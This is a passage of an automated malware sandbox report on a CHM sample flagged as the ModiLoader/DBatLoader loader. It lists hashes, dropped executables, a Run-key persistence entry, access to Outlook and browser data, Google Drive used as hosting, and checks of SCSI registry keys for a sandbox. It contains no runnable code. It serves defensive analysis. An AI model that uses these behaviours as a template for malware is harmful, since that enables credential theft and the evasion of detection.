Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
21/01/2025, 03:36
Static task
static1
Behavioral task
behavioral1
Sample
a8f92f91412bcf71275883d86a3df7fdcc29d7ac3104f261e6e5d71f033ee101.chm
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
a8f92f91412bcf71275883d86a3df7fdcc29d7ac3104f261e6e5d71f033ee101.chm
Resource
win10v2004-20241007-en
General
-
Target
a8f92f91412bcf71275883d86a3df7fdcc29d7ac3104f261e6e5d71f033ee101.chm
-
Size
75KB
-
MD5
92588daadcf11b3311b82e8b20219340
-
SHA1
68c690da91c4a1cb0e7336b055ea87877a7b8b9d
-
SHA256
a8f92f91412bcf71275883d86a3df7fdcc29d7ac3104f261e6e5d71f033ee101
-
SHA512
38fa50cfad7f030712b9c8a81af995b0319075aa5e9ba3768d799bf13aa0532130d491bb6d90d0c8fbc2e8ffacc31e85629152d3281d4818eb8716d0f16cd523
-
SSDEEP
1536:PRReoi9mRqozQM8I3FInJQqcN8HSsIN2i5reqgdMb0OYqFHPf:5Rez9kTAoFI7jq2i6qgGbzYOn
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Modiloader family
-
ModiLoader Second Stage 61 IoCs
resource yara_rule behavioral2/memory/2344-50-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-56-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-60-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-66-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-92-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-76-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-114-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-113-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-112-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-110-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-109-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-108-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-107-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-106-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-105-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-103-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-104-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-100-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-98-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-95-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-111-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-87-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-84-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-102-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-82-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-101-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-80-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-79-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-97-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-78-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-96-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-94-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-77-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-93-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-91-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-75-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-90-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-65-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-89-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-74-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-88-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-73-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-64-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-86-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-72-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-85-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-83-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-71-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-70-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-81-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-69-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-68-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-67-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-59-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-63-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-62-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-61-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-58-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-57-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-55-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 behavioral2/memory/2344-54-0x0000000002A20000-0x0000000003A20000-memory.dmp modiloader_stage2 -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 112 powershell.exe 1844 powershell.exe -
Executes dropped EXE 32 IoCs
pid Process 4400 ript.exe 2344 x.exe 1928 svchost.pif 3304 alpha.pif 2228 Upha.pif 1980 alpha.pif 1608 Upha.pif 4312 alpha.pif 2248 aken.pif 2548 xbnitqnH.pif 4512 alg.exe 1056 DiagnosticsHub.StandardCollector.Service.exe 5704 fxssvc.exe 5844 elevation_service.exe 6016 elevation_service.exe 6100 maintenanceservice.exe 2596 msdtc.exe 2432 OSE.EXE 3716 PerceptionSimulationService.exe 4740 perfhost.exe 5048 locator.exe 2416 SensorDataService.exe 3576 snmptrap.exe 2168 spectrum.exe 2688 ssh-agent.exe 5500 TieringEngineService.exe 4796 AgentService.exe 2248 vds.exe 4372 vssvc.exe 5144 wbengine.exe 5220 WmiApSrv.exe 5388 SearchIndexer.exe -
Loads dropped DLL 1 IoCs
pid Process 1928 svchost.pif -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 xbnitqnH.pif Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 xbnitqnH.pif Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 xbnitqnH.pif -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Hnqtinbx = "C:\\Users\\Public\\Hnqtinbx.url" x.exe -
Hide Artifacts: Hidden Window 1 TTPs 1 IoCs
Windows that would typically be displayed when an application carries out an operation can be hidden.
pid Process 1260 cmd.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 23 drive.google.com 27 drive.google.com -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 39 checkip.dyndns.org 47 reallyfreegeoip.org 48 reallyfreegeoip.org -
Drops file in System32 directory 31 IoCs
description ioc Process File opened for modification C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe xbnitqnH.pif File opened for modification C:\Windows\system32\msiexec.exe xbnitqnH.pif File opened for modification C:\Windows\System32\OpenSSH\ssh-agent.exe xbnitqnH.pif File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\7783b8df99262766.bin alg.exe File opened for modification C:\Windows\System32\SensorDataService.exe xbnitqnH.pif File opened for modification C:\Windows\system32\spectrum.exe xbnitqnH.pif File opened for modification C:\Windows\system32\dllhost.exe xbnitqnH.pif File opened for modification C:\Windows\System32\msdtc.exe xbnitqnH.pif File opened for modification C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe xbnitqnH.pif File opened for modification C:\Windows\SysWow64\perfhost.exe xbnitqnH.pif File opened for modification C:\Windows\system32\locator.exe xbnitqnH.pif File opened for modification C:\Windows\system32\vssvc.exe xbnitqnH.pif File opened for modification C:\Windows\system32\SearchIndexer.exe xbnitqnH.pif File opened for modification C:\Windows\system32\dllhost.exe alg.exe File opened for modification C:\Windows\System32\SensorDataService.exe alg.exe File opened for modification C:\Windows\system32\SgrmBroker.exe alg.exe File opened for modification C:\Windows\system32\AppVClient.exe xbnitqnH.pif File opened for modification C:\Windows\system32\SgrmBroker.exe xbnitqnH.pif File opened for modification C:\Windows\system32\AgentService.exe xbnitqnH.pif File opened for modification C:\Windows\system32\MSDtc\MSDTC.LOG msdtc.exe File opened for modification C:\Windows\system32\AgentService.exe alg.exe File opened for modification C:\Windows\System32\vds.exe xbnitqnH.pif File opened for modification C:\Windows\system32\wbengine.exe xbnitqnH.pif File opened for modification C:\Windows\system32\wbem\WmiApSrv.exe xbnitqnH.pif File opened for modification C:\Windows\System32\alg.exe xbnitqnH.pif File opened for modification C:\Windows\System32\snmptrap.exe xbnitqnH.pif File opened for modification C:\Windows\system32\fxssvc.exe alg.exe File opened for modification C:\Windows\system32\msiexec.exe alg.exe File opened for modification C:\Windows\system32\fxssvc.exe xbnitqnH.pif File opened for modification C:\Windows\system32\TieringEngineService.exe xbnitqnH.pif File opened for modification C:\Windows\system32\AppVClient.exe alg.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2344 set thread context of 2548 2344 x.exe 116 -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\unpack200.exe xbnitqnH.pif File opened for modification C:\Program Files\Windows Media Player\wmpnetwk.exe alg.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\java.exe alg.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\javaws.exe alg.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\servertool.exe xbnitqnH.pif File opened for modification C:\Program Files\Mozilla Firefox\crashreporter.exe xbnitqnH.pif File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe xbnitqnH.pif File opened for modification C:\Program Files\Common Files\microsoft shared\ink\mip.exe alg.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe alg.exe File opened for modification C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe alg.exe File opened for modification C:\Program Files (x86)\Internet Explorer\ieinstal.exe alg.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe xbnitqnH.pif File opened for modification C:\Program Files\Java\jre-1.8\bin\orbd.exe alg.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe xbnitqnH.pif File opened for modification C:\Program Files\Java\jdk-1.8\bin\java.exe xbnitqnH.pif File opened for modification C:\Program Files\Java\jdk-1.8\bin\klist.exe xbnitqnH.pif File opened for modification C:\Program Files\Java\jdk-1.8\bin\rmic.exe xbnitqnH.pif File opened for modification C:\Program Files\Java\jdk-1.8\bin\rmid.exe xbnitqnH.pif File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\pack200.exe xbnitqnH.pif File opened for modification C:\Program Files\VideoLAN\VLC\vlc-cache-gen.exe xbnitqnH.pif File opened for modification C:\Program Files\Java\jdk-1.8\bin\schemagen.exe alg.exe File opened for modification C:\Program Files\Common Files\microsoft shared\Source Engine\OSE.EXE xbnitqnH.pif File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateCore.exe alg.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\serialver.exe alg.exe File opened for modification C:\Program Files\Mozilla Firefox\private_browsing.exe xbnitqnH.pif File opened for modification C:\Program Files\Common Files\microsoft shared\OFFICE16\LICLUA.EXE alg.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleCrashHandler64.exe alg.exe File opened for modification C:\Program Files (x86)\Internet Explorer\iexplore.exe alg.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\jstack.exe xbnitqnH.pif File opened for modification C:\Program Files\Java\jdk-1.8\bin\jhat.exe alg.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe alg.exe File opened for modification C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe alg.exe File opened for modification C:\Program Files (x86)\Internet Explorer\ielowutil.exe alg.exe File opened for modification C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_87484\javaws.exe xbnitqnH.pif File opened for modification C:\Program Files\Java\jdk-1.8\bin\javah.exe xbnitqnH.pif File opened for modification C:\Program Files\Java\jre-1.8\bin\rmiregistry.exe xbnitqnH.pif File opened for modification C:\Program Files\Internet Explorer\ielowutil.exe alg.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\klist.exe alg.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe alg.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\extcheck.exe xbnitqnH.pif File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\keytool.exe xbnitqnH.pif File opened for modification C:\Program Files\Java\jre-1.8\bin\javacpl.exe alg.exe File opened for modification C:\Program Files\VideoLAN\VLC\vlc-cache-gen.exe alg.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\java-rmi.exe xbnitqnH.pif File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe alg.exe File opened for modification C:\Program Files\Internet Explorer\iediagcmd.exe alg.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe alg.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\policytool.exe xbnitqnH.pif File opened for modification C:\Program Files\Java\jdk-1.8\bin\javafxpackager.exe xbnitqnH.pif File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\ktab.exe xbnitqnH.pif File opened for modification C:\Program Files\Java\jdk-1.8\bin\extcheck.exe alg.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\jcmd.exe alg.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\unpack200.exe alg.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\ssvagent.exe alg.exe File opened for modification C:\Program Files (x86)\Common Files\Oracle\Java\javapath\javaw.exe alg.exe File opened for modification C:\Program Files\7-Zip\7zG.exe xbnitqnH.pif File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\chrmstp.exe alg.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\jarsigner.exe alg.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\ssvagent.exe alg.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\rmiregistry.exe alg.exe File opened for modification C:\Program Files\Mozilla Firefox\pingsender.exe alg.exe File opened for modification C:\Program Files\Mozilla Firefox\updater.exe alg.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe xbnitqnH.pif File opened for modification C:\Program Files\Java\jdk-1.8\bin\jhat.exe xbnitqnH.pif -
Drops file in Windows directory 3 IoCs
description ioc Process File opened for modification C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe xbnitqnH.pif File opened for modification C:\Windows\DtcInstall.log msdtc.exe File opened for modification C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe alg.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language x.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xbnitqnH.pif -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C spectrum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 spectrum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 SensorDataService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 spectrum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A spectrum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 spectrum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 spectrum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 SensorDataService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A SensorDataService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A spectrum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 spectrum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A spectrum.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName spectrum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 spectrum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 spectrum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 SensorDataService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 SensorDataService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 SensorDataService.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName spectrum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 spectrum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 SensorDataService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 SensorDataService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C spectrum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 spectrum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 SensorDataService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C SensorDataService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A spectrum.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName SensorDataService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A SensorDataService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A SensorDataService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 SensorDataService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A SensorDataService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A spectrum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A SensorDataService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C SensorDataService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A SensorDataService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A spectrum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C spectrum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 SensorDataService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 SensorDataService.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName spectrum.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName SensorDataService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 spectrum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A spectrum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C spectrum.exe Key opened 